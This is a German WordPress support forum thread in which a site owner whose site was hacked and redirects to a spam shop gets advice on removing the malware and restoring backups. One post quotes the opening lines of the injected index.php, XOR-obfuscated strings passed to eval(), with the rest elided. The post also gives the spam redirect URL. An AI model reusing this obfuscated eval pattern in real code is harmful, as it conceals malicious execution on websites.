Support » Allgemeine Fragen » wp-login, statt Login-Seite wird Homepage gestartet

Ansicht von 15 Antworten - 1 bis 15 (von insgesamt 19)
  • Edit: Deine Seite ist gehackt worden. Deine Webseite leitet auf einen Onlineshop weiter. https :// onlineshop.2024salefactory . com / category ? name=bioderma%2030%20spf%20mat

    • Diese Antwort wurde geändert vor 3 Tage, 16 Stunden von grafruessel.
    • Diese Antwort wurde geändert vor 3 Tage, 15 Stunden von grafruessel.

    Ich kanns nicht ganz auflösen, aber wenn ich deinen Link zum Beilspiel in Google Chat einfüge und anschliessend darauf klicke, werde ich auf den Shop weitergeleitet.

    • Diese Antwort wurde geändert vor 3 Tage, 15 Stunden von grafruessel.
    Thread-Starter guewawu1957

    (@guewawu1957)

    Hallo graffrussel,
    erstmal vielen Dank für die Bereitschaft mir bei der Lösung des Problem zu helfen.
    Glücklicherweise habe ich eine weitere mit identischen Themes und ähnlichen inhalten aufgebaute Seite (tt-alb.de).
    Ich nutze bei beiden das Themes Catch Box.
    Ich habe beiden Seiten in 2017 angelegt und mich damals etwas tiefer in WP eingelesen.
    Für mich sieht es so aus als das mein genutztes Menü in Catch Box integriert ist.

    Weitere, vieleicht nützliche, Informationen:
    – Mit Updraft habe ich regelmässig die Daten gesichert.
    Da ich mich jedoch nicht einlogen kann, kann ich kein Backup starten.
    – Am 10.05. gegen 11.00 Uhr habe ich letzmalig die Seite bearbeitet.

    Meine Ideen oder Fragen zur weiteren Vorgehensweise
    – Wäre ein Backup ohne login überhaupt möglich ?
    – Versuche Startseite durch eine Umbenennung unbenutzbar zu machen.

    Wäre ein Backup ohne login überhaupt möglich ?

    Ein Backup nicht, dafür musst du angemeldet sein. Aber eine Wiederherstellung. Kommt aber auf das Backup-Plugin an.

    Ich nutze bei beiden das Themes Catch Box.

    Wenn du meinst, dass deine Website nicht gehackt wurde (wieso dann die Umleitung?), kannst du das Verzeichnis wp-content/themes/catch-box per FTP umbenennen. WordPress fällt dann auf eines der (hoffentlich noch vorhandenen?) Standard-Themes zurück und eine Anmeldung sollte möglich sein.

    Übrigens haben einige Webhoster ebenfalls Backups und stellen sie auf Wunsch (und ggf. gegen Gebühr) auch wieder her. Man sollte nur nicht zu lange warten, weil ältere Backups beim Webhoster fortlaufend entsorgt werden.

    Thread-Starter guewawu1957

    (@guewawu1957)

    Habe mich im Webspace von Strato eingelogt.

    Es gibt da eine index.old.20240511 mit folgendem inhalt:
    <?php
    define( ‚WP_USE_THEMES‘, true );
    require DIR . ‚/wp-blog-header.php‘;

    Und eine index.php mit folgendem Inhalt
    <?php
    $IFHRTNWG = „\x2a\x31\x21\x24\x35\x2a\x28\x28\x35\x20\x22\x3f“^’MKTJVEEXGEQL‘;
    $WXPGQWSX = „\x2c\x22\x36\x30\x61\x7f\x16\x27\x2d\x21\x2e\x2f\x3f“^’NCEUWKICHBAKZ‘;
    eval($IFHRTN…… es folgen hunderte von Zeichen ….

    Die index.php meiner anderen funktionierender Seite sieht so aus:

    <?php
    /**

    • Front to the WordPress application. This file doesn’t do anything, but loads
    • wp-blog-header.php which does and tells WordPress to load the theme.
      *
    • @package WordPress
      */

    /**

    • Tells WordPress to load the WordPress theme and output it.
      *
    • @var bool
      */
      define( ‚WP_USE_THEMES‘, true );

    /** Loads the WordPress Environment and Template */
    require DIR . ‚/wp-blog-header.php‘;

    Na bitte, da hast du doch den Malware Code.

    Können wir sonst noch etwas für dich tun?

    Thread-Starter guewawu1957

    (@guewawu1957)

    Im Webspace habe ich zwei Themes Ordner.
    Ich habe vorsichtshalber beide Ordnernamen geändert.
    Lieder beides ohne den gewünschten Erfolg.
    Ist für mich unlogisch, woher weis nun WP das Themes Catch-Box geladen werden soll.

    Wir reden ganz offentsichtlich aneinander vorbei.

    Deine Website wurde gehackt. Durch die Einschleusung von Malware funktioniert sie nicht so, wie sie soll. Die Website muss entweder von Malware bereinigt werden oder du solltest ein Backup wiederherstellen, das nicht von der Malware betroffen ist. Wenn du selber nicht auf so ein Backup zur Wiederherstellung zurückgreifen kannst, frag bitte den Support deines Webhosters.

    Die Reinigung einer Website von Malware ist ein aufwendiger Prozess, weil nach einer Sicherung von Daten und eigenen Uploads alle Dateien auf dem Server restlos gelöscht und anschließend WordPress, verwendetes Theme und Plugins wieder hochgeladen werden müssen. Die eigenen Uploads müssen vor einer Wiederherstellung sorgfältig auf Schadskripte geprüft werden. Die Datenbank muss auf neue, unerwünschte Nutzer geprüft werden. Erheblich leichter ist es, ein sauberes Backup wiederherzustellen.

    Es hilft nichts, das Theme zu wechseln, wenn die Website mit Malware versehen ist.

    Thread-Starter guewawu1957

    (@guewawu1957)

    Hallo Bego Mario Garde,
    vielen Dank, für dich scheint das Problem gelöst zu sein.
    Es hört sich vieleicht etwas blöd an, aber was soll ich nun tun?

    Kann ich einfach die index.php, mit dem sehr langen Inhalt (Malware ?), löschen und die index.old in index.php umbenennen, oder muss ich den Code von meiner anderen funktionierden Seite in die index.php einfügen ?

    Nein, für mich ist nicht das Problem gelöst, sondern die Ursache ziemlich eindeutig.

    Was du nun tun sollst, habe ich ausführlich beschrieben. Bitte sei so freundlich und lies dir dazu meine letzte Antwort noch einmal durch.

    Es reicht sehr wahrscheinlich nicht, den Schadcode aus der index.php zu entfernen, weil Angreifer in den meisten Fällen so genannten Backdoors platzieren – Hintertüren, über die sie jederzeit wieder Zugriff auf den Server bekommen und nach Belieben Änderungen vornehmen können. Wie das behoben werden kann, habe ich bereits grob umrissen: Entweder ein eigenes Backup wiederherstellen, den Support des Webhosters darum bitten, ein Backup wiederherzustellen oder die Dateien austauschen bzw. einzeln sichten, was aber sehr mühsam ist. Da ein Austausch der Dateien für Einsteiger mühsam ist, solltest du dich an einen Dienstleister wenden. (Vorsorglich an dieser Stelle der freundliche Hinweis, dass Jobangebote jeglicher Art hier im Forum ausdrücklich unerwünscht sind.)

    @guewawu1957

    Du kannst dich entweder selbst da reinlesen oder suchst dir einen Profi, der dir die Webseite wieder fit macht.

    Das war die Kurzform. 😉

    Thread-Starter guewawu1957

    (@guewawu1957)

    OK, fasse ich, aus meiner Sicht, nocheinmal zusammen.

    Schade das es keine Möglichkeit gibt, zumindest mich kurzfristig einzulogen. Dann könnte ich die Daten mit Plugin Updraft wiederherstellen.

    Ich habe nun Strato kontaktiert, mal sehen ob die Daten vom 10.05.2024 noch vorliegen und was das Einspielen des Standes vom 10.05. kostet.

    Als letzter Weg bleibt mir dann der Zugriff auf die Backupdatei mittels FTP.
    Um dann die wiederhergestellten Daten wieder hochzuladen.


    Schade das es keine Möglichkeit gibt, zumindest mich kurzfristig einzulogen. Dann könnte ich die Daten mit Plugin Updraft wiederherstellen.

    Du hattest bisher auf meine zweifache Frage, welches Backup-Plugin du verwendet hast, nicht geantwortet. Mit UpdraftPlus WP Backup kannst du ein Backup auch wiederherstellen, ohne im Backend angemeldet zu sein.

    Variante 1
    Du sicherst alle Backup-Dateien (das sollte zumindest ein Backup der Datenbank und deiner Uploads sein), löschst ausnahmslos alles auf dem Server, installierst WordPress und UpdraftPus neu, lädst die Backup-Dateien hoch und stellst sie über das Backend der neuen WordPress-Installation wieder her. (wird hier beschrieben: How do I restore my site with UpdraftPlus?)

    Variante 2
    Du sicherst alle Backup-Dateien (das sollte zumindest ein Backup der Datenbank und deiner Uploads sein), löschst ausnahmslos alles auf dem Server, installierst WordPress und UpdraftPus neu, entpackst die Backup-Dateien und lädst sie auf den Server hoch bzw. importierst die Datenbank mit phpMyAdmin (wird hier beschrieben: installierst WordPress und UpdraftPus neu).

    Beide Varianten entsprechen deiner Beschreibung „Zugriff auf die Backupdatei mittels FTP, um dann die wiederhergestellten Daten wieder hochzuladen.“

    Du kannst natürlich versuchen, die Datei index.php zu löschen und anschließend index.old.20240511 in index.php umzubenennen. Es mag sein, dass du dann Zugriff auf das Backend bekommst. Deine Website ist damit aber wahrscheinlich nicht von Malware gesäubert.

    Thread-Starter guewawu1957

    (@guewawu1957)

    Ich nutze das kostenlose Updraft ob dies UpdraftPlus entsricht weiß ich nicht.
    Eine einfache Umbenennung der beiden index Dateien brachte nicht den gewünschten Erfolg.
    Habe die index.php entfernt, so das keiner mehr die Homepage aufrufen kann.
    Bin nun dabei mit FileZilla die Varinate 1 zum wiederherstellen mittels FTP durchzuführen.
    Werde mich in Updarft einlesen.
    Denke so müsste es dann gehen:
    1. Vorsichthalber alles per FTP herunterladen (Waren fast 6.000 Dateien)
    2. Den inhalt des WP-Ordner bei Strato komplett leeren.
    3. WP neu installieren
    4. Updraft neu installieren
    5. Die Backup-Datei im Ordner Updraft einspielen
    6. Die Backup-Datei mit Updraft wiederherstellen.

    Werde hierfür aber ein paar Tage brauchen.
    Melde mich hier nochmal wenn ich diese erledigt habe.

    PS:
    Ich bin Ende der 90er noch mit FrontPageExpress und NetObjectFusion groß geworden, damals war alles noch in html geschrieben worden.
    Langsam komme ich in die Jahre, deshalb brauche ich auch etwas länger um Texte auch zu verstehen.

Ansicht von 15 Antworten - 1 bis 15 (von insgesamt 19)